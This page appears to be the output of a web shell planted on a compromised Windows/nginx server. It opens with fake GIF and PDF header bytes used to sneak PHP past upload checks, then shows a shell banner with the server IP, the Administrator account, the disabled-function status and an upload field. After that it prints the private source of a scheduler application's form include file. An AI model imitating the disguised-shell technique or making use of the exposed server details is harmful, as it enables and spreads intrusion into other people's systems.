GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/Scheduler/admin/_info/form/ |
Upload File : |
<? // admin/_info/form/infoForm_Code_ControlCode.phpinc // Display the control code. t_Begin(); // Begin TRACKing included file. if ( !isset($f['formListControl']) ) $f['formListControl'] = 'task'; switch ($f['formListControl']) { case 'task': $f['displayCodeControlUsingText'] = 'task'; break; case 'task_subtask': $f['displayCodeControlUsingText'] = 'task & subtask'; break; case 'form_task': $f['displayCodeControlUsingText'] = 'form & task'; break; } #d_V('control_code','d'); if ( !isset($f['control_code']) ) { $f['control_code'] = 1; } #d_V(false,'d'); ?> <a name="control_code_name"></a> <input type="hidden" name="control_code_value" id="control_code_value_id" value="<?=$f['control_code_value']?>"> <table><tr><td><fieldset><legend><a href="#control_code_name" name="control_code" onClick="return info_Set(this);"><div id="control_code_status" class="inline"><? if ( !$f['control_code_value']) { ?>+<? } else { ?>-<? } ?></div> control code <span class="small_info">(using <?=$f['displayCodeControlUsingText']?>)</span></a><input type="submit" name="subtask" value="Reload page" onClick="info_gotoName(this,'control_code_name');"><input type="submit" name="subtask" value="Expand code" onClick="info_gotoName(this,'control_code_name');"><input type="submit" name="subtask" value="Collapse code" onClick="info_gotoName(this,'control_code_name');"></legend> <div id="control_code_show" class="<? if ( !$f['control_code_value']) { ?>d_s_h <? } ?>d_s_l"> <textarea class="code_info" name="control_code" id="txa_control_code" wrap="off"> <? // directory_path/index.php // Perform form tasks. $authorizedPermissions="USER"; // List of groups authorized to view this page (i.e., PUBLIC = anyone, USER = any user, "Admin,Manager" = users in the Admin or Manager groups). require('../application.phpinc'); // Include application setup file. Use a relative path. pageHeader(''); switch ($task) { case '': case 'Cancel': case 'Done': require('directory_path/<?=$tableName?>_ListForm.phpinc'); break; case 'Add': case 'Edit': require('directory_path/<?=$tableName?>_Form.phpinc'); break; case 'Add <?=$tableName?>': case 'Update <?=$tableName?>': require('directory_path/<?=$tableName?>_FormVerify.phpinc'); if (!isset($formError)) { require('directory_path/<?=$tableName?>_FormProcess.phpinc'); require('directory_path/<?=$tableName?>_ListForm.phpinc'); } else { require('directory_path/<?=$tableName?>_Form.phpinc'); } break; default: programmingError("The task [".$f['task']."], subtask [".$f['subtask']."], form [".$f['form']."] is not programmed."); } pageFooter(); ?> </textarea> </div> </fieldset></td></tr></table> <? t_End(); // End TRACKing included file. ?>